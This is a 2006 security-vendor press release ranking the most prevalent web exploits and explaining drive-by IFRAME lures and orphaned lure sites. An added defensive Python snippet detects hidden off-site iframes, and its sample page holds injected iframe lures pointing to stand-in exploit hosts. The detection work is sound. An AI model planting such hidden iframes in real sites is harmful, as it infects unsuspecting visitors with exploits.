EXPLOIT PREVENTION LABS RELEASES AUGUST EXPLOIT PREVALENCE SURVEY

Survey Adds Tracking the Prevalence of Orphaned Lure Sites

September 12, 2006 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), the leading developer of anti-exploit software, today released findings for its August 2006 Exploit Prevalence Survey™. Now in its fourth month, the Exploit Prevalence Survey is the first monthly survey to measure the top web-borne exploits based on real-world prevalence data. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ SocketShield anti-exploit software, combined with exploit distribution data captured from the company’s popular LinkScanner online URL scanning service and network of automated hunting-pots.

New to this month’s report is tracking of orphaned lure sites. Orphaned lures are trusted web sites that have been hacked and which contain IFRAME links that call out to exploit servers that are dead or dormant. An IFRAME is a common HTML tag, and it is the primary mechanism used by cyber criminals to infect web site visitors with exploits via drive-by downloads. When a user with an unpatched system visits the site, the IFRAME tag causes the user’s browser to silently connect to another server, often an exploit server, which then attempts to force-download exploit code onto the user’s computer.
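A defender-side check for the mechanism described above, added here as an example and not part of the press release or of the SocketShield or LinkScanner products: it lists every off-site IFRAME on a page, notes whether the frame is sized or styled to be invisible, and, given a host-liveness lookup (stubbed with a constructed table here), labels each lure active or orphaned. The sample page and host names are constructed.

```python
"""Added example (not Exploit Prevention Labs code): find IFRAME lures on a
page and classify each as active or orphaned via a host-liveness callback."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag on a page."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def is_hidden(attrs):
    """Drive-by lures are usually 0x0 or 1x1 frames, or hidden via CSS."""
    w, h = attrs.get("width", "").strip(), attrs.get("height", "").strip()
    style = attrs.get("style", "").replace(" ", "").lower()
    return (w in ("0", "1") or h in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def classify_lures(html, page_host, host_is_live):
    """Return [(src, hidden, status)] for every iframe whose src points
    off-site. status is 'active' if the exploit host answers, else 'orphaned'."""
    collector = IframeCollector()
    collector.feed(html)
    results = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        if not host or host == page_host:
            continue  # same-origin frames are ordinary site content
        status = "active" if host_is_live(host) else "orphaned"
        results.append((src, is_hidden(attrs), status))
    return results


# Constructed sample: a hacked "trusted" page with two injected lure frames.
SAMPLE_PAGE = """<html><body><h1>Trusted Widgets Inc.</h1>
<iframe src="https://www.trusted-widgets.example/footer.html" width="600" height="80"></iframe>
<iframe src="http://exploit-host.invalid/in.cgi?3" width="1" height="1"></iframe>
<iframe src="http://dormant-host.invalid/x.php" style="display: none"></iframe>
</body></html>"""
LIVE_HOSTS = {"exploit-host.invalid": True, "dormant-host.invalid": False}  # constructed


def demo():
    return classify_lures(SAMPLE_PAGE, "www.trusted-widgets.example",
                          lambda h: LIVE_HOSTS.get(h, False))
```

In practice the liveness callback would be a DNS lookup or an HTTP probe from a sandboxed host; orphaned entries are worth re-checking periodically, since the text notes that dormant exploit servers are often reactivated.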

“Although these sites are not actively serving exploits right now, we keep a close eye on them because cyber criminals frequently reactivate their exploit servers at a later date,” said Roger Thompson, CTO of Exploit Prevention Labs and the survey’s primary author. “The orphaned lures are also interesting because the site owners remain oblivious to the fact that they’ve been hacked and that they most likely remain vulnerable to further hacks by the exploit distributors.”

Exploit Prevalence Results for the Month of August 2006
The following is a summary of the top five most-reported web exploits for the month of August 2006:

WebAttacker
Rank last month: 2
Percent of overall occurrences: 30.36 percent
Description: WebAttacker is a Russian-built software application, first introduced about 18 months ago, which currently launches four different exploits: MDAC, a Firefox exploit, CreateTextRange, and an exploit for the Java Virtual Machine. Like a commercial software application, it can be purchased online, but on underground hacker web sites, for between $20 and $300, and it requires minimal technical sophistication to use. It is updated every few months, just like legitimate commercial software, except that it is crimeware; it was last updated in July, most likely for bug fixes.

Iframers launcher script
Rank last month: 1
Percent of overall occurrences: 16.81 percent
Description: Propagated by a cybercrime organization sometimes called the CoolWebSearch gang, or the Russian iframers, this exploit is perpetrated by a cybercrime mob generally thought to be based in St. Petersburg, Russia. This organization is responsible for the Circuit City hack in early June 2006. A simple HTML tag called an iframe, embedded on a hacked web site, redirects the visitor’s web browser to an exploit server operated by the gang, which attempts to deposit up to eight different exploits onto the user’s computer.

WMF (CVE-2005-2124) with known payload
Rank last month: 3
Percent of overall occurrences: 15.78 percent
Description: Windows Metafile exploit from December 2005. It uses a little-known feature of Windows Metafiles to execute arbitrary code, including malware. The exploit, a genuine zero-day attack, was allegedly purchased for $5,000 from a Russian hacking group. Seven months after Microsoft issued a patch, it is still widely used by cybercriminals.

Orphaned Lures
Rank last month: New metric
Percent of overall occurrences: 9.78 percent
Description: Orphaned lures are trusted web sites that have been hacked and which contain IFRAME links that call out to exploit servers that are currently dead or dormant.

CreateTextRange (CVE-2006-1359)
Rank last month: 5
Percent of overall occurrences: 8.40 percent
Description: Released March 2006. This is a buffer overflow attack affecting Internet Explorer that enables the execution of arbitrary code, usually a downloader, a program whose job is to download and install another program such as a rootkit or a keylogger. Patched in April by Microsoft, this exploit appears to be in decline.

Note: The numbers above do not add up to 100 percent because of the following less-frequently reported exploits: TriMode (7.38 percent), MDAC (6.69 percent), GromSploit (new: 4.80 percent).

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Resource Center at http://www.explabs.com/about/resCenter/index.html.

About SocketShield and LinkScanner
SocketShield (free trial: http://www.explabs.com/ss/trial.html) is the industry’s first reliable solution to protect Internet users against the growing threat of zero-day exploits and malicious web sites that target vulnerabilities in unpatched Windows software.

SocketShield provides a critical layer of security that complements the defenses provided by traditional security solutions. Firewalls cannot stop exploits, because exploits enter within the trusted communications stream of the user’s browser connection. Anti-virus and anti-spyware applications can’t protect against exploits because they must wait for the malware code to hit the hard disk in order to detect it, and by that time most exploits have already executed their payload. Patch management systems can’t distribute a patch until the application vendor releases it. And patching as a general practice, while critical, often fails because it relies on users taking action of their own volition.

LinkScanner is a free real-time URL scanner that tells users whether a site they intend to visit has been poisoned by an exploit distribution network. LinkScanner is available at http://www.explabs.com/linkscanner/.

About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops security software to protect against Web-based exploits and malicious web sites. SocketShield, the company’s flagship product, provides patent-pending protection against zero-day exploits during the critical risk window between the announcement of a vulnerability and the provision of a patch by the vendor. Exploit Prevention Labs also offers the free LinkScanner URL checker, which determines whether or not a web site is distributing exploits. More information about Exploit Prevention Labs and SocketShield may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler
Dovetail Public Relations
408.395.3600
xpl@dovetailpr.com